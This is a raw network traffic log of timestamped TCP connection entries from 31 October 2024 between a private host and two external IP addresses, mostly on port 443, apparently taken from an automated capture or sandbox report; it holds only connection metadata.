                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.771960974 CET51340443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.772016048 CET4435134013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.772105932 CET51340443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.772259951 CET51340443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.772274971 CET4435134013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.816472054 CET4435133513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.816502094 CET4435133513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.816638947 CET51335443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.816654921 CET4435133513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.816703081 CET51335443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.816708088 CET4435133513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.816720009 CET4435133513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.816767931 CET51335443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.817301989 CET51335443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.817320108 CET4435133513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.817331076 CET51335443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.817337036 CET4435133513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.821053028 CET51341443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.821113110 CET4435134113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.821221113 CET51341443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.821389914 CET51341443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.821403027 CET4435134113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.300432920 CET4435133713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.301198959 CET51337443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.301218033 CET4435133713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.301799059 CET51337443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.301804066 CET4435133713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.425905943 CET4435133813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.426564932 CET51338443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.426590919 CET4435133813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.426970005 CET51338443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.426976919 CET4435133813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.431632042 CET4435133713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.431664944 CET4435133713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.431723118 CET4435133713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.431746960 CET51337443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.431787014 CET51337443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.432054996 CET51337443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.432068110 CET4435133713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.432080030 CET51337443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.432085037 CET4435133713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.435587883 CET51342443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.435604095 CET4435134213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.435707092 CET51342443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.435885906 CET51342443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.435895920 CET4435134213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.487160921 CET4435134013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.487951040 CET51340443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.487976074 CET4435134013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.488378048 CET51340443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.488383055 CET4435134013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.506443977 CET4435133913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.506911993 CET51339443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.506922007 CET4435133913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.507302999 CET51339443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.507307053 CET4435133913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.554171085 CET4435133813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.554342031 CET4435133813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.554512024 CET51338443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.554649115 CET51338443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.554649115 CET51338443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.554672956 CET4435133813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.554682970 CET4435133813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.557056904 CET4435134113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.557487965 CET51341443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.557507992 CET4435134113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.557935953 CET51341443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.557940960 CET4435134113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.558224916 CET51343443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.558260918 CET4435134313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.558330059 CET51343443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.558476925 CET51343443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.558487892 CET4435134313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.614697933 CET4435134013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.614772081 CET4435134013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.614914894 CET51340443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.615101099 CET51340443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.615123034 CET4435134013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.615134001 CET51340443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.615139961 CET4435134013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.618215084 CET51344443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.618256092 CET4435134413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.618386030 CET51344443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.618513107 CET51344443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.618526936 CET4435134413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.637778997 CET4435133913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.637955904 CET4435133913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.638025999 CET51339443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.642625093 CET51339443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.642656088 CET4435133913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.642683983 CET51339443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.642689943 CET4435133913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.646475077 CET51345443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.646511078 CET4435134513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.646584034 CET51345443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.646737099 CET51345443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.646752119 CET4435134513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.686187029 CET4435134113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.686408043 CET4435134113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.686602116 CET51341443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.686716080 CET51341443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.686716080 CET51341443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.686736107 CET4435134113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.686745882 CET4435134113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.690102100 CET51346443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.690140009 CET4435134613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.690233946 CET51346443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.690465927 CET51346443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:18.690479994 CET4435134613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.199014902 CET4435134213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.203607082 CET51342443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.203624964 CET4435134213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.204375029 CET51342443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.204381943 CET4435134213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.292793989 CET4435134313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.293431044 CET51343443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.293457031 CET4435134313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.293970108 CET51343443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.293976068 CET4435134313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.329768896 CET4435134213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.329839945 CET4435134213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.329895973 CET51342443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.330214977 CET51342443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.330230951 CET4435134213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.330240011 CET51342443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.330245972 CET4435134213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.343327045 CET51347443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.343368053 CET4435134713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.343466043 CET4435134413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.343489885 CET51347443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.343857050 CET51347443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.343869925 CET4435134713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.344033957 CET51344443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.344049931 CET4435134413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.344738007 CET51344443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.344743967 CET4435134413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.378590107 CET4435134513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.379307032 CET51345443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.379327059 CET4435134513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.380211115 CET51345443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.380217075 CET4435134513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.421782017 CET4435134613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.422027111 CET4435134313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.422118902 CET4435134313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.422167063 CET51343443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.422395945 CET51346443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.422409058 CET4435134613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.422465086 CET51343443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.422465086 CET51343443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.422480106 CET4435134313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.422492027 CET4435134313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.422801971 CET51346443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.422811031 CET4435134613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.425693035 CET51348443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.425719023 CET4435134813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.426040888 CET51348443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.426100016 CET51348443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.426112890 CET4435134813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.472287893 CET4435134413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.472352028 CET4435134413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.472408056 CET51344443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.472645044 CET51344443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.472668886 CET4435134413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.472681046 CET51344443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.472687960 CET4435134413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.475781918 CET51349443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.475825071 CET4435134913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.475886106 CET51349443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.476041079 CET51349443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.476056099 CET4435134913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.511687040 CET4435134513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.511754990 CET4435134513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.511810064 CET51345443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.512077093 CET51345443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.512077093 CET51345443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.512094021 CET4435134513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.512104988 CET4435134513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.515058994 CET51350443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.515094042 CET4435135013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.515187979 CET51350443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.515333891 CET51350443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.515347004 CET4435135013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.577649117 CET4435134613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.578763008 CET4435134613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.578882933 CET51346443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.578975916 CET51346443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.578975916 CET51346443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.578994036 CET4435134613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.579005003 CET4435134613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.582505941 CET51351443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.582549095 CET4435135113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.582602024 CET51351443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.582900047 CET51351443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.582911015 CET4435135113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.600204945 CET4973780192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.605407953 CET8049737160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:19.605465889 CET4973780192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.070585012 CET4435134713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.071559906 CET51347443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.071573973 CET4435134713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.072050095 CET51347443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.072057009 CET4435134713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.156198978 CET4435134813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.160630941 CET51348443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.160651922 CET4435134813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.161351919 CET51348443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.161358118 CET4435134813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.196160078 CET4435134913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.200054884 CET4435134713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.200130939 CET4435134713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.200198889 CET51347443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.200355053 CET51349443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.200387001 CET4435134913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.200483084 CET51347443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.200483084 CET51347443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.200498104 CET4435134713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.200510025 CET4435134713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.200889111 CET51349443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.200896025 CET4435134913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.203964949 CET51352443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.203980923 CET4435135213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.204102993 CET51352443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.204262972 CET51352443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:20.204284906 CET4435135213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.284194946 CET4435134813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.284225941 CET4435134813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.284287930 CET51348443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.284296036 CET4435134813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.284303904 CET4435134913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.284372091 CET51348443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.284451962 CET4435134913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.284538031 CET51349443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.284640074 CET51348443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.284655094 CET4435134813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.284668922 CET51348443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.284673929 CET4435134813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.286339998 CET4435135013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.286526918 CET51349443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.286546946 CET4435134913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.286559105 CET51349443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.286565065 CET4435134913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.288060904 CET51353443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.288095951 CET4435135313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.288176060 CET51353443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.288400888 CET51350443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.288415909 CET4435135013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.289050102 CET51350443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.289055109 CET4435135013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.289338112 CET51353443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.289354086 CET4435135313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:21.290522099 CET51354443192.168.2.413.107.246.45
